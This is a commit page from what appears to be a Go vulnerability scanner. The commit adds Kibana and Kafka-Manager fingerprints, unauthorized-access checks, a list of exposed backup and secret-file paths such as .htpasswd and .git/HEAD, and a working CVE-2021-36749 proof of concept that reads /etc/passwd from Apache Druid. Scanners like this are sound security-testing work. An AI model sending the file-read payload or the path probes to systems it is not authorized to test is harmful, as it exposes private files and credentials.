增加识别Kibana、Kafka-Manager未授权访问,识别cve-2021-36749,扫描网站备份目录

alsjz · Aug 15, 2023 · 8bf3e08 · 8bf3e08
1 parent 48615fd
commit 8bf3e08
Show file tree

Hide file tree

Showing 11 changed files with 101 additions and 22 deletions.
diff --git a/README.md b/README.md
@@ -42,6 +42,9 @@
 | 21 | Hadoop-Administration |  √   |      仅验证未授权访问      |
 | 22 |     APACHE-Spark      |  √   |      仅验证未授权访问      |
 | 23 |        swagger        |  √   |      仅验证未授权访问      |
+| 24 |        Kibana         |  √   |      仅验证未授权访问      |
+| 25 |     Kafka-Manager     |  √   |      仅验证未授权访问      |
+
 
 ## 端口扫描现阶段支持功能
 | 序号 |     功能     | 是否支持 |                                   备注                                   |

diff --git a/poc/run.go b/poc/run.go
@@ -59,6 +59,7 @@ func CheckPoc(url, app string) {
 		"couchdb":       {url, "CouchDB未授权访问", "可通过/_all_dbs获取所有数据库"},
 		"hadoop":        {url, "Hadoop-Administration未授权访问", ""},
 		"apache-spark":  {url, "Apache-Spark未授权访问", ""},
+		"kafka-manager": {url, "Kafka-Manager未授权访问", ""},
 	}
 	for aps, flag := range authPocs {
 		if strings.Contains(app, aps) {

diff --git a/poc/yaml-poc/poc-yaml-AuthSwagger.yaml b/poc/yaml-poc/poc-yaml-AuthSwagger.yaml
@@ -26,5 +26,4 @@ expression:
   body_any:
     - "Swagger UI"
     - "swagger-ui.min.js"
-    - "swagger"
     - "Swagger 2.0"
diff --git a/poc/yaml-poc/poc-yaml-Directory-traversal.yaml b/poc/yaml-poc/poc-yaml-Directory-traversal.yaml
diff --git a/poc/yaml-poc/poc-yaml-Druidun-cve-2021-36749.yaml b/poc/yaml-poc/poc-yaml-Druidun-cve-2021-36749.yaml
@@ -0,0 +1,45 @@
+name: poc-yaml-Druidun-cve-2021-36749
+description: "可使用使用file://协议进行读取文件"
+method: POST
+headers:
+  Content-Type: "application/json;charset=UTF-8"
+body: >
+  {
+    "type":"index",
+    "spec":{
+      "type":"index",
+      "ioConfig":{
+        "type":"index",
+        "firehose":{
+          "type":"http",
+          "uris":["file:///etc/passwd"]
+        }
+      },
+      "dataSchema":{
+        "dataSource":"sample",
+        "parser":{
+          "type":"string",
+          "parseSpec":{
+            "format":"regex",
+            "pattern":"(.*)",
+            "columns":["a"],
+            "dimensionsSpec":{},
+            "timestampSpec":{
+              "column":"!!!_no_such_column_!!!",
+              "missingValue":"2010-01-01T00:00:00Z"
+            }
+          }
+        }
+      }
+    },
+    "samplerConfig":{
+      "numRows":500,
+      "timeoutMs":15000
+    }
+  }
+path:
+  - "/druid/indexer/v1/sampler?for=connect"
+expression:
+  status: 200
+  body_any:
+    - "root:x:"
diff --git a/poc/yaml-poc/poc-yaml-kibana-unauth.yaml b/poc/yaml-poc/poc-yaml-kibana-unauth.yaml
@@ -0,0 +1,9 @@
+name: poc-yaml-kibana-unauth
+description: "kibana未授权访问"
+method: GET
+path:
+  - "/app/kibana"
+expression:
+  status: 200
+  body_any:
+    - "kibanaWelcomeView"
diff --git a/poc/yaml-poc/poc-yaml-website-backup-download.yaml b/poc/yaml-poc/poc-yaml-website-backup-download.yaml
@@ -0,0 +1,22 @@
+name: poc-yaml-website-backup-download
+description: "备份文件下载"
+alwaysExecute: true
+request:
+  method: GET
+  path:
+    - "/backup.tar.gz"
+    - "/backup.zip"
+    - "/backup.sql"
+    - "/backup.rar"
+    - "/backup.bak"
+    - "/.git/HEAD"
+    - "/.svn/entries"
+    - "/.hg/dirstate"
+    - "/.DS_Store"
+    - "/.htaccess"
+    - "/.htpasswd"
+    - "/web.config"
+    - "/db/backup.db"
+    - "/db/backup.sql"
+expression:
+  status: 200
diff --git a/port/Protocol/web_RuleDatas.go b/port/Protocol/web_RuleDatas.go
@@ -13,6 +13,9 @@ var RuleDatas = []RuleData{
 	{"Exchange", "body", "(Outlook)|/owa/"},
 	{"APACHE-ActiveMQ", "body", "(Apache ActiveMQ)"},
 	{"Jetty", "body", "(Powered by Jetty)"},
+	{"Kibana", "body", "(kibanaLegacy)"},
+	{"Kafka-Manager", "headers", "Kafka-Manager"},
+	{"Kafka-Manager[未授权访问]", "body", "(<title>Kafka Manager</title>)"},
 	{"Jumpserver堡垒机", "body", "(Jumpserver|全球首款完全开源的堡垒机)"},
 	{"天融信-入侵检测系统TopSentry", "body", "(<title>天融信入侵检测系统TopSentry</title>|TopSentry)"},
 	{"天融信-入侵防御系统TopIDP", "body", "(<title>天融信入侵防御系统TopIDP</title>|TopIDP)"},
@@ -24,7 +27,7 @@ var RuleDatas = []RuleData{
 	{"frp", "body", "(Faithfully yours, frp)"},
 	{"Spark", "body", "(serverSparkVersion)"},
 	{"Apache-Spark", "body", "(Spark Worker at)"},
-	{"数据库|CouchDB[存在未授权漏洞]", "body", "(couchdb.*?uuid)"},
+	{"数据库|CouchDB[未授权访问]", "body", "(couchdb.*?uuid)"},
 	{"Hadoop-Administration", "body", "(DataNode Information|Hadoop Administration)"},
 	{"go-pprof", "body", "(Node Exporter)"},
 	{"Django", "body", "(DisallowedHost)"},
@@ -40,7 +43,8 @@ var RuleDatas = []RuleData{
 	{"织梦内容管理系统", "body", "(织梦内容管理系统)"},
 	{"宝塔", "body", "(app.bt.cn/static/app.png|安全入口校验失败|<title>入口校验失败</title>|href=\"http://www.bt.cn/bbs|恭喜, 站点创建成功！)"},
 	{"启明防火墙", "body", "(/cgi-bin/webui?op=get_product_model)"},
-	{"数据库|ElasticSearch[存在未授权漏洞]", "body", `(?s)"name"\s*:\s*"[^"]*".*?"cluster_name"\s*:\s*"[^"]*".*?"cluster_uuid"\s*:\s*"[^"]*".*?"number"\s*:\s*"[^"]*"`},
+	{"数据库|ElasticSearch[未授权访问]", "body", `(?s)"name"\s*:\s*"[^"]*".*?"cluster_name"\s*:\s*"[^"]*".*?"cluster_uuid"\s*:\s*"[^"]*".*?"number"\s*:\s*"[^"]*"`},
+	{"数据库|ElasticSearch", "body", "security_exception"},
 	{"AList", "body", "(由 AList 驱动|alist_pic.js)"},
 	{"数据库「MongoDB」", "body", `(MongoDB)`},
 	{"ZABBIX-监控系统", "body", "(Zabbix SIA|<title>omni: Zabbix</title>|images/general/zabbix.ico|Zabbix SIA|zabbix-server: Zabbix)"},

diff --git a/port/pareIP.go b/port/pareIP.go
@@ -21,9 +21,9 @@ func parseIP(ip string) {
 		if p == "" {
 			continue
 		}
+		replacer := strings.NewReplacer("https://", "", "http://", "")
+		p = replacer.Replace(p)
 
-		p = strings.ReplaceAll(p, "https://", "")
-		p = strings.ReplaceAll(p, "http://", "")
 		if len(p) > 0 && p[len(p)-1] == '/' {
 			p = p[:len(p)-1]
 		}
@@ -96,8 +96,18 @@ func parseFileIP(path string) {
 		data, _ := os.ReadFile(path)
 		for _, v := range strings.Split(string(data), "\n") {
 			if v != "" {
-				v = strings.ReplaceAll(v, "\r", "")
-				v = strings.ReplaceAll(v, " ", "")
+				if strings.Contains(v, "-") {
+					continue
+				}
+				replacer := strings.NewReplacer("\r", "", " ", "", "https://", "", "http://", "")
+				v = replacer.Replace(v)
+				if len(strings.Split(v, ":")) == 2 {
+					ip := strings.Split(v, ":")[0]
+					nowPort := strings.Split(v, ":")[1]
+					portlist = append(portlist, nowPort)
+					parseIP(ip)
+					continue
+				}
 				parseIP(v)
 			}
 		}

diff --git a/port/parsePort.go b/port/parsePort.go
@@ -6,7 +6,7 @@ import (
 )
 
 func parsePort(port string) {
-	if len(portlist) == 1 { //如果是快速扫描则已经有端口了
+	if len(portlist) > 0 { //是否有特定端口
 		return
 	}
 

diff --git a/port/protocol.go b/port/protocol.go
@@ -31,7 +31,6 @@ var portProtocols = map[string]string{
 	"1723":  "PPTP",
 	"2049":  "NFS",
 	"3389":  "RDP",
-	"5601":  "Kibana",
 	"5900":  "VNC",
 	"5901":  "VNC",
 	"6000":  "X11",